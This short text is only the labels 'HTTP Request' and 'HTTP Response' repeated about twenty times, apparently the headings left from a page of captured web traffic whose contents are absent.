HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Request

HTTP Request

HTTP Response